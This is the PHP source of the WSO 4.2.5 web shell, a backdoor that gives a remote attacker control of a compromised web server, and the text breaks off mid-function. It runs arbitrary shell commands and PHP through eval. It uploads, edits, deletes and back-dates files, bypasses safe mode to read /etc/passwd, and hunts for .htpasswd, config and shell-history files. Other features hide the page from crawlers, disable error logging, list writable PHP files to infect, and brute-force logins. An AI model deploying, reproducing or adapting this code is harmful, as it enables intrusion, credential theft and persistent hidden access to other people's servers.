$▛="";$▘=true;$▜='UTF-8';$▚='FilesMan';$▙=md5($_SERVER['HTTP_USER_AGENT']);if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])){prototype(md5($_SERVER['HTTP_HOST'])."key",$▙);}if(empty($_POST['charset']))$_POST['charset']=$▜;if(!isset($_POST['ne'])){if(isset($_POST['a']))$_POST['a']=iconv("utf-8",$_POST['charset'],decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));if(isset($_POST['c']))$_POST['c']=iconv("utf-8",$_POST['charset'],decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));if(isset($_POST['p1']))$_POST['p1']=iconv("utf-8",$_POST['charset'],decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));if(isset($_POST['p2']))$_POST['p2']=iconv("utf-8",$_POST['charset'],decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));if(isset($_POST['p3']))$_POST['p3']=iconv("utf-8",$_POST['charset'],decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));}function decrypt($str,$pwd){return$str;}@ini_set('error_log',null);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@set_time_limit(0);if(PHP_VERSION_ID<70000)@set_magic_quotes_runtime(0);@define('VERSION','4.2.5');if(get_magic_quotes_gpc()){function stripslashes_array($array){return is_array($array)?array_map('stripslashes_array',$array):stripslashes($array);}$_POST=stripslashes_array($_POST);$_COOKIE=stripslashes_array($_COOKIE);}if(!empty($▛)){if(isset($_POST['pass'])&&(md5($_POST['pass'])==$▛))prototype(md5($_SERVER['HTTP_HOST']),$▛);if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])])||($_COOKIE[md5($_SERVER['HTTP_HOST'])]!=$▛))hardLogin();}if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']))$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']=(bool)$▘;function hardLogin(){if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}die("
Password
");}if(strtolower(substr(PHP_OS,0,3))=="win")$os='win';else $os='nix';$safe_mode=@ini_get('safe_mode');if(!$safe_mode)error_reporting(0);$disable_functions=@ini_get('disable_functions');$home_cwd=@getcwd();if(isset($_POST['c']))@chdir($_POST['c']);$cwd=@getcwd();if($os=='win'){$home_cwd=str_replace("\\","/",$home_cwd);$cwd=str_replace("\\","/",$cwd);}if($cwd[strlen($cwd)-1]!='/')$cwd.='/';function hardHeader(){if(empty($_POST['charset']))$_POST['charset']=$GLOBALS['▜'];echo"".$_SERVER['HTTP_HOST']." - WSO ".VERSION."
";$freeSpace=@diskfreespace($GLOBALS['cwd']);$totalSpace=@disk_total_space($GLOBALS['cwd']);$totalSpace=$totalSpace?$totalSpace:1;$release=@php_uname('r');$kernel=@php_uname('s');$explink='http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';if(strpos('Linux',$kernel)!==false)$explink.=urlencode('Linux Kernel '.substr($release,0,6));else $explink.=urlencode($kernel.' '.substr($release,0,3));if(!function_exists('posix_getegid')){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="?";}else{$uid=@posix_getpwuid(@posix_geteuid());$gid=@posix_getgrgid(@posix_getegid());$user=$uid['name'];$uid=$uid['uid'];$group=$gid['name'];$gid=$gid['gid'];}$cwd_links='';$path=explode("/",$GLOBALS['cwd']);$n=count($path);for($i=0;$i<$n-1;$i++){$cwd_links.="".$path[$i]."/";}$charsets=array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');$opt_charsets='';foreach($charsets as$▟)$opt_charsets.='';$m=array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');if(!empty($GLOBALS['▛']))$m['Logout']='Logout';$m['Self remove']='SelfRemove';$menu='';foreach($m as$k=>$v)$menu.='[ '.$k.' ]';$drives="";if($GLOBALS['os']=='win'){foreach(range('c','z') as$drive)if(is_dir($drive.':\\'))$drives.='[ '.$drive.' ] ';}echo''.''.'
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os']=='win'?'
Drives:':'').'		'.substr(@php_uname(),0,120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'
Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'.''.$menu.'
';}function hardFooter(){$is_writable=is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)";echo"
Change dir:
Read file:
Make dir:".$is_writable."
Make file:".$is_writable."
Execute:
Upload file:".$is_writable."
";}if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}function ex($in){$▖='';if(function_exists('exec')){@exec($in,$▖);$▖=@join("\n",$▖);}elseif(function_exists('passthru')){ob_start();@passthru($in);$▖=ob_get_clean();}elseif(function_exists('system')){ob_start();@system($in);$▖=ob_get_clean();}elseif(function_exists('shell_exec')){$▖=shell_exec($in);}elseif(is_resource($f=@popen($in,"r"))){$▖="";while(!@feof($f))$▖.=fread($f,1024);pclose($f);}else return"↳ Unable to execute command\n";return($▖==''?"↳ Query did not return anything\n":$▖);}function viewSize($s){if($s>=1073741824)return sprintf('%1.2f',$s/1073741824).' GB';elseif($s>=1048576)return sprintf('%1.2f',$s/1048576).' MB';elseif($s>=1024)return sprintf('%1.2f',$s/1024).' KB';else return$s.' B';}function perms($p){if(($p&0xC000)==0xC000)$i='s';elseif(($p&0xA000)==0xA000)$i='l';elseif(($p&0x8000)==0x8000)$i='-';elseif(($p&0x6000)==0x6000)$i='b';elseif(($p&0x4000)==0x4000)$i='d';elseif(($p&0x2000)==0x2000)$i='c';elseif(($p&0x1000)==0x1000)$i='p';else $i='u';$i.=(($p&0x0100)?'r':'-');$i.=(($p&0x0080)?'w':'-');$i.=(($p&0x0040)?(($p&0x0800)?'s':'x'):(($p&0x0800)?'S':'-'));$i.=(($p&0x0020)?'r':'-');$i.=(($p&0x0010)?'w':'-');$i.=(($p&0x0008)?(($p&0x0400)?'s':'x'):(($p&0x0400)?'S':'-'));$i.=(($p&0x0004)?'r':'-');$i.=(($p&0x0002)?'w':'-');$i.=(($p&0x0001)?(($p&0x0200)?'t':'x'):(($p&0x0200)?'T':'-'));return$i;}function viewPermsColor($f){if(!@is_readable($f))return''.perms(@fileperms($f)).'';elseif(!@is_writable($f))return''.perms(@fileperms($f)).'';else return''.perms(@fileperms($f)).'';}function hardScandir($dir){if(function_exists("scandir")){return scandir($dir);}else{$dh=opendir($dir);while(false!==($filename=readdir($dh)))$files[]=$filename;return$files;}}function which($p){$path=ex('which '.$p);if(!empty($path))return$path;return false;}function actionRC(){if(!@$_POST['p1']){$a=array("uname"=>php_uname(),"php_version"=>phpversion(),"VERSION"=>VERSION,"safemode"=>@ini_get('safe_mode'));echo serialize($a);}else{eval($_POST['p1']);}}function prototype($k,$v){$_COOKIE[$k]=$v;setcookie($k,$v);}function actionSecInfo(){hardHeader();echo'

Server security information

';function showSecParam($n,$v){$v=trim($v);if($v){echo''.$n.': ';if(strpos($v,"\n")===false)echo$v.'
';else echo'
'.$v.'
';}}showSecParam('Server software',@getenv('SERVER_SOFTWARE'));if(function_exists('apache_get_modules'))showSecParam('Loaded Apache modules',implode(', ',apache_get_modules()));showSecParam('Disabled PHP Functions',$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');showSecParam('Open base dir',@ini_get('open_basedir'));showSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));showSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));showSecParam('cURL support',function_exists('curl_version')?'enabled':'no');$temp=array();if(function_exists('mysql_get_client_info'))$temp[]="MySql (".mysql_get_client_info().")";if(function_exists('mssql_connect'))$temp[]="MSSQL";if(function_exists('pg_connect'))$temp[]="PostgreSQL";if(function_exists('oci_connect'))$temp[]="Oracle";showSecParam('Supported databases',implode(', ',$temp));echo'
';if($GLOBALS['os']=='nix'){showSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes [view]":'no');showSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes [view]":'no');showSecParam('OS version',@file_get_contents('/proc/version'));showSecParam('Distr name',@file_get_contents('/etc/issue.net'));if(!$GLOBALS['safe_mode']){$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');$danger=array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');$downloaders=array('wget','fetch','lynx','links','curl','get','lwp-mirror');echo'
';$temp=array();foreach($userful as$▟)if(which($▟))$temp[]=$▟;showSecParam('Userful',implode(', ',$temp));$temp=array();foreach($danger as$▟)if(which($▟))$temp[]=$▟;showSecParam('Danger',implode(', ',$temp));$temp=array();foreach($downloaders as$▟)if(which($▟))$temp[]=$▟;showSecParam('Downloaders',implode(', ',$temp));echo'
';showSecParam('HDD space',ex('df -h'));showSecParam('Hosts',@file_get_contents('/etc/hosts'));showSecParam('Mount options',@file_get_contents('/etc/fstab'));}}else{showSecParam('OS Version',ex('ver'));showSecParam('Account Settings',iconv('CP866','UTF-8',ex('net accounts')));showSecParam('User Accounts',iconv('CP866','UTF-8',ex('net user')));}echo'
';hardFooter();}function actionFilesTools(){if(isset($_POST['p1']))$_POST['p1']=urldecode($_POST['p1']);if(@$_POST['p2']=='download'){if(@is_file($_POST['p1'])&&@is_readable($_POST['p1'])){ob_start("ob_gzhandler",4096);header("Content-Disposition: attachment; filename=".basename($_POST['p1']));if(function_exists("mime_content_type")){$type=@mime_content_type($_POST['p1']);header("Content-Type: ".$type);}else header("Content-Type: application/octet-stream");$fp=@fopen($_POST['p1'],"r");if($fp){while(!@feof($fp))echo @fread($fp,1024);fclose($fp);}}exit;}if(@$_POST['p2']=='mkfile'){if(!file_exists($_POST['p1'])){$fp=@fopen($_POST['p1'],'w');if($fp){$_POST['p2']="edit";fclose($fp);}}}hardHeader();echo'

File tools

';if(!file_exists(@$_POST['p1'])){echo'File not exists';hardFooter();return;}$uid=@posix_getpwuid(@fileowner($_POST['p1']));if(!$uid){$uid['name']=@fileowner($_POST['p1']);$gid['name']=@filegroup($_POST['p1']);}else $gid=@posix_getgrgid(@filegroup($_POST['p1']));echo'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';echo'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';if(empty($_POST['p2']))$_POST['p2']='view';if(is_file($_POST['p1']))$m=array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch','Frame');else $m=array('Chmod','Rename','Touch');foreach($m as$v)echo''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';echo'

';switch($_POST['p2']){case 'view':echo'
';$fp=@fopen($_POST['p1'],'r');if($fp){while(!@feof($fp))echo htmlspecialchars(@fread($fp,1024));@fclose($fp);}echo'
';break;case 'highlight':if(@is_readable($_POST['p1'])){echo'
';$oRb=@highlight_file($_POST['p1'],true);echo str_replace(array(''),array(''),$oRb).'
';}break;case 'chmod':if(!empty($_POST['p3'])){$perms=0;for($i=strlen($_POST['p3'])-1;$i>=0;--$i)$perms+=(int)$_POST['p3'][$i]*pow(8,(strlen($_POST['p3'])-$i-1));if(!@chmod($_POST['p1'],$perms))echo'Can\'t set permissions!
';}clearstatcache();echo'
';break;case 'edit':if(!is_writable($_POST['p1'])){echo'File isn\'t writeable';break;}if(!empty($_POST['p3'])){$time=@filemtime($_POST['p1']);$_POST['p3']=substr($_POST['p3'],1);$fp=@fopen($_POST['p1'],"w");if($fp){@fwrite($fp,$_POST['p3']);@fclose($fp);echo'Saved!
';@touch($_POST['p1'],$time,$time);}}echo'
';break;case 'hexdump':$c=@file_get_contents($_POST['p1']);$n=0;$h=array('00000000
','','');$len=strlen($c);for($i=0;$i<$len;++$i){$h[1].=sprintf('%02X',ord($c[$i])).' ';switch(ord($c[$i])){case 0:$h[2].=' ';break;case 9:$h[2].=' ';break;case 10:$h[2].=' ';break;case 13:$h[2].=' ';break;default:$h[2].=$c[$i];break;}$n++;if($n==32){$n=0;if($i+1<$len){$h[0].=sprintf('%08X',$i+1).'
';}$h[1].='
';$h[2].="\n";}}echo'
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';break;case 'rename':if(!empty($_POST['p3'])){if(!@rename($_POST['p1'],$_POST['p3']))echo'Can\'t rename!
';else die('');}echo'
';break;case 'touch':if(!empty($_POST['p3'])){$time=strtotime($_POST['p3']);if($time){if(!touch($_POST['p1'],$time,$time))echo'Fail!';else echo'Touched!';}else echo'Bad time format!';}clearstatcache();echo'
';break;case 'frame':$frameSrc=substr(htmlspecialchars($GLOBALS['cwd']),strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));if($frameSrc[0]!='/')$frameSrc='/'.$frameSrc;if($frameSrc[strlen($frameSrc)-1]!='/')$frameSrc=$frameSrc.'/';$frameSrc=$frameSrc.htmlspecialchars($_POST['p1']);echo'';break;}echo'
';hardFooter();}if($os=='win')$aliases=array("List Directory"=>"dir","Find index.php in current dir"=>"dir /s /w /b index.php","Find *config*.php in current dir"=>"dir /s /w /b *config*.php","Show active connections"=>"netstat -an","Show running services"=>"net start","User accounts"=>"net user","Show computers"=>"net view","ARP Table"=>"arp -a","IP Configuration"=>"ipconfig /all");else $aliases=array("List dir"=>"ls -lha","list file attributes on a Linux second extended file system"=>"lsattr -va","show opened ports"=>"netstat -an | grep -i listen","process status"=>"ps aux","Find"=>"","find all suid files"=>"find / -type f -perm -04000 -ls","find suid files in current dir"=>"find . -type f -perm -04000 -ls","find all sgid files"=>"find / -type f -perm -02000 -ls","find sgid files in current dir"=>"find . -type f -perm -02000 -ls","find config.inc.php files"=>"find / -type f -name config.inc.php","find config* files"=>"find / -type f -name \"config*\"","find config* files in current dir"=>"find . -type f -name \"config*\"","find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls","find all service.pwd files"=>"find / -type f -name service.pwd","find service.pwd files in current dir"=>"find . -type f -name service.pwd","find all .htpasswd files"=>"find / -type f -name .htpasswd","find .htpasswd files in current dir"=>"find . -type f -name .htpasswd","find all .bash_history files"=>"find / -type f -name .bash_history","find .bash_history files in current dir"=>"find . -type f -name .bash_history","find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc","Locate"=>"","locate httpd.conf files"=>"locate httpd.conf","locate vhosts.conf files"=>"locate vhosts.conf","locate proftpd.conf files"=>"locate proftpd.conf","locate psybnc.conf files"=>"locate psybnc.conf","locate my.conf files"=>"locate my.conf","locate admin.php files"=>"locate admin.php","locate cfg.php files"=>"locate cfg.php","locate conf.php files"=>"locate conf.php","locate config.dat files"=>"locate config.dat","locate config.php files"=>"locate config.php","locate config.inc files"=>"locate config.inc","locate config.inc.php"=>"locate config.inc.php","locate config.default.php files"=>"locate config.default.php","locate config* files "=>"locate config","locate .conf files"=>"locate '.conf'","locate .pwd files"=>"locate '.pwd'","locate .sql files"=>"locate '.sql'","locate .htpasswd files"=>"locate '.htpasswd'","locate .bash_history files"=>"locate '.bash_history'","locate .mysql_history files"=>"locate '.mysql_history'","locate .fetchmailrc files"=>"locate '.fetchmailrc'","locate backup files"=>"locate backup","locate dump files"=>"locate dump","locate priv files"=>"locate priv");function actionConsole(){if(!empty($_POST['p1'])&&!empty($_POST['p2'])){prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out',true);$_POST['p1'].=' 2>&1';}elseif(!empty($_POST['p1']))prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out',0);if(isset($_POST['ajax'])){prototype(md5($_SERVER['HTTP_HOST']).'ajax',true);ob_start();echo"d.cf.cmd.value='';\n";$temp=@iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){if(@chdir($match[1])){$GLOBALS['cwd']=@getcwd();echo"c_='".$GLOBALS['cwd']."';";}}echo"d.cf.output.value+='".$temp."';";echo"d.cf.output.scrollTop = d.cf.output.scrollHeight;";$temp=ob_get_clean();echo strlen($temp),"\n",$temp;exit;}if(empty($_POST['ajax'])&&!empty($_POST['p1']))prototype(md5($_SERVER['HTTP_HOST']).'ajax',0);hardHeader();echo"";echo'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
';echo'
';hardFooter();}function actionPhp(){if(isset($_POST['ajax'])){$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']=true;ob_start();eval($_POST['p1']);$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";echo strlen($temp),"\n",$temp;exit;}hardHeader();if(isset($_POST['p2'])&&($_POST['p2']=='info')){echo'

PHP info

';ob_start();phpinfo();$tmp=ob_get_clean();$tmp=preg_replace('!body {.*}!msiU','',$tmp);$tmp=preg_replace('!a:\w+ {.*}!msiU','',$tmp);$tmp=preg_replace('!h1!msiU','h2',$tmp);$tmp=preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);$tmp=preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);echo$tmp;echo'

';}if(empty($_POST['ajax'])&&!empty($_POST['p1']))$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']=false;echo'

Execution PHP-code

';echo' send using AJAX
';if(!empty($_POST['p1'])){ob_start();eval($_POST['p1']);echo htmlspecialchars(ob_get_clean());}echo'
';hardFooter();}function actionFilesMan(){if(!empty($_COOKIE['f']))$_COOKIE['f']=@unserialize($_COOKIE['f']);if(!empty($_POST['p1'])){switch($_POST['p1']){case 'uploadFile':if(is_array($_FILES['f']['tmp_name'])){foreach($_FILES['f']['tmp_name'] as$i=>$tmpName){if(!@move_uploaded_file($tmpName,$_FILES['f']['name'][$i])){echo"Can't upload file!";}}}break;case 'mkdir':if(!@mkdir($_POST['p2']))echo"Can't create new dir";break;case 'delete':function deleteDir($path){$path=(substr($path,-1)=='/')?$path:$path.'/';$dh=opendir($path);while(($▟=readdir($dh))!==false){$▟=$path.$▟;if((basename($▟)=="..")||(basename($▟)=="."))continue;$type=filetype($▟);if($type=="dir")deleteDir($▟);else @unlink($▟);}closedir($dh);@rmdir($path);}if(is_array(@$_POST['f']))foreach($_POST['f'] as$f){if($f=='..')continue;$f=urldecode($f);if(is_dir($f))deleteDir($f);else @unlink($f);}break;case 'paste':if($_COOKIE['act']=='copy'){function copy_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false)if(($f!=".") and ($f!=".."))copy_paste($c.$s.'/',$f,$d.$s.'/');}elseif(is_file($c.$s))@copy($c.$s,$d.$s);}foreach($_COOKIE['f'] as$f)copy_paste($_COOKIE['c'],$f,$GLOBALS['cwd']);}elseif($_COOKIE['act']=='move'){function move_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false)if(($f!=".") and ($f!=".."))copy_paste($c.$s.'/',$f,$d.$s.'/');}elseif(@is_file($c.$s))@copy($c.$s,$d.$s);}foreach($_COOKIE['f'] as$f)@rename($_COOKIE['c'].$f,$GLOBALS['cwd'].$f);}elseif($_COOKIE['act']=='zip'){if(class_exists('ZipArchive')){$zip=new ZipArchive();if($zip->open($_POST['p2'],1)){chdir($_COOKIE['c']);foreach($_COOKIE['f'] as$f){if($f=='..')continue;if(@is_file($_COOKIE['c'].$f))$zip->addFile($_COOKIE['c'].$f,$f);elseif(@is_dir($_COOKIE['c'].$f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/',FilesystemIterator::SKIP_DOTS));foreach($iterator as$key=>$value){$zip->addFile(realpath($key),$key);}}}chdir($GLOBALS['cwd']);$zip->close();}}}elseif($_COOKIE['act']=='unzip'){if(class_exists('ZipArchive')){$zip=new ZipArchive();foreach($_COOKIE['f'] as$f){if($zip->open($_COOKIE['c'].$f)){$zip->extractTo($GLOBALS['cwd']);$zip->close();}}}}elseif($_COOKIE['act']=='tar'){chdir($_COOKIE['c']);$_COOKIE['f']=array_map('escapeshellarg',$_COOKIE['f']);ex('tar cfzv '.escapeshellarg($_POST['p2']).' '.implode(' ',$_COOKIE['f']));chdir($GLOBALS['cwd']);}unset($_COOKIE['f']);setcookie('f','',time()-3600);break;default:if(!empty($_POST['p1'])){prototype('act',$_POST['p1']);prototype('f',serialize(@$_POST['f']));prototype('c',@$_POST['c']);}break;}}hardHeader();echo'

File manager

';$dirContent=hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);if($dirContent===false){echo'Can\'t open this folder!';hardFooter();return;}global $sort;$sort=array('name',1);if(!empty($_POST['p1'])){if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))$sort=array($match[1],(int)$match[2]);}echo" ";$dirs=$files=array();$n=count($dirContent);for($i=0;$i<$n;$i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array('name'=>$dirContent[$i],'path'=>$GLOBALS['cwd'].$dirContent[$i],'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),'perms'=>viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i]));if(@is_file($GLOBALS['cwd'].$dirContent[$i]))$files[]=array_merge($tmp,array('type'=>'file'));elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))$dirs[]=array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&&($dirContent[$i]!="."))$dirs[]=array_merge($tmp,array('type'=>'dir'));}$GLOBALS['sort']=$sort;function cmp($a,$b){if($GLOBALS['sort'][0]!='size')return strcmp(strtolower($a[$GLOBALS['sort'][0]]),strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);else return(($a['size']<$b['size'])?-1:1)*($GLOBALS['sort'][1]?1:-1);}usort($files,"cmp");usort($dirs,"cmp");$files=array_merge($dirs,$files);$l=0;foreach($files as$f){echo'';$l=$l?0:1;}echo"
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" '.(empty($f['link'])?'':"title='".$f['link']."'").'>[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'].'R T'.(($f['type']=='file')?' F E D':'').'
";if(!empty($_COOKIE['act'])&&@count($_COOKIE['f'])&&(($_COOKIE['act']=='zip')||($_COOKIE['act']=='tar')))echo" file name:  ";echo"
";hardFooter();}function actionStringTools(){if(!function_exists('hex2bin')){function hex2bin($p){return decbin(hexdec($p));}}if(!function_exists('binhex')){function binhex($p){return dechex(bindec($p));}}if(!function_exists('hex2ascii')){function hex2ascii($p){$r='';for($i=0;$i'base64_encode','Base64 decode'=>'base64_decode','Url encode'=>'urlencode','Url decode'=>'urldecode','Full urlencode'=>'full_urlencode','md5 hash'=>'md5','sha1 hash'=>'sha1','crypt'=>'crypt','CRC32'=>'crc32','ASCII to HEX'=>'ascii2hex','HEX to ASCII'=>'hex2ascii','HEX to DEC'=>'hexdec','HEX to BIN'=>'hex2bin','DEC to HEX'=>'dechex','DEC to BIN'=>'decbin','BIN to HEX'=>'binhex','BIN to DEC'=>'bindec','String to lower case'=>'strtolower','String to upper case'=>'strtoupper','Htmlspecialchars'=>'htmlspecialchars','String length'=>'strlen',);if(isset($_POST['ajax'])){prototype(md5($_SERVER['HTTP_HOST']).'ajax',true);ob_start();if(in_array($_POST['p1'],$stringTools))echo$_POST['p1']($_POST['p2']);$temp="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";echo strlen($temp),"\n",$temp;exit;}if(empty($_POST['ajax'])&&!empty($_POST['p1']))prototype(md5($_SERVER['HTTP_HOST']).'ajax',0);hardHeader();echo'

String conversions

';echo"
send using AJAX
";if(!empty($_POST['p1'])){if(in_array($_POST['p1'],$stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));}echo"

Search files:

Text:
Path:
Name:
";function hardRecursiveGlob($path){if(substr($path,-1)!='/')$path.='/';$paths=@array_unique(@array_merge(@glob($path.$_POST['p3']),@glob($path.'*',GLOB_ONLYDIR)));if(is_array($paths)&&@count($paths)){foreach($paths as$▟){if(@is_dir($▟)){if($path!=$▟)hardRecursiveGlob($▟);}else{if(empty($_POST['p2'])||@strpos(file_get_contents($▟),$_POST['p2'])!==false)echo"".htmlspecialchars($▟)."
";}}}}if(@$_POST['p3'])hardRecursiveGlob($_POST['c']);echo"

Search for hash:









";hardFooter();}function actionSafeMode(){$temp='';ob_start();switch($_POST['p1']){case 1:$temp=@tempnam($test,'cx');if(@copy("compress.zlib://".$_POST['p2'],$temp)){echo @file_get_contents($temp);unlink($temp);}else echo'Sorry... Can\'t open file';break;case 2:$files=glob($_POST['p2'].'*');if(is_array($files))foreach($files as$filename)echo$filename."\n";break;case 3:$ch=curl_init("file://".$_POST['p2']."\x00".SELF_PATH);curl_exec($ch);break;case 4:ini_restore("safe_mode");ini_restore("open_basedir");include($_POST['p2']);break;case 5:for(;$_POST['p2']<=$_POST['p3'];$_POST['p2']++){$uid=@posix_getpwuid($_POST['p2']);if($uid)echo join(':',$uid)."\n";}break;case 6:if(!function_exists('imap_open'))break;$stream=imap_open($_POST['p2'],"","");if($stream==false)break;echo imap_body($stream,1);imap_close($stream);break;}$temp=ob_get_clean();hardHeader();echo'

Safe mode bypass

';echo'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
';if($temp)echo'
'.$temp.'
';echo'
';hardFooter();}function actionLogout(){setcookie(md5($_SERVER['HTTP_HOST']),'',time()-3600);die('bye!');}function actionSelfRemove(){if($_POST['p1']=='yes')if(@unlink(preg_replace('!\(\d+\)\s.*!','',__FILE__)))die('Shell has been removed');else echo'unlink error!';if($_POST['p1']!='yes')hardHeader();echo'

Suicide

Really want to remove the shell?
Yes
';hardFooter();}function actionInfect(){hardHeader();echo'

Infect

';if($_POST['p1']=='infect'){$target=$_SERVER['DOCUMENT_ROOT'];function ListFiles($dir){if($dh=opendir($dir)){$files=array();$inner_files=array();while($file=readdir($dh)){if($file!="."&&$file!=".."){if(is_dir($dir."/".$file)){$inner_files=ListFiles($dir."/".$file);if(is_array($inner_files))$files=array_merge($files,$inner_files);}else{array_push($files,$dir."/".$file);}}}closedir($dh);return$files;}}foreach(ListFiles($target) as$key=>$file){$nFile=substr($file,-4,4);if($nFile==".php"){if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){echo$file."
";$i++;}}}echo"".$i."";}else{echo"
";echo'Really want to infect the server? Yes
';}hardFooter();}function actionBruteforce(){hardHeader();if(isset($_POST['proto'])){echo'

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
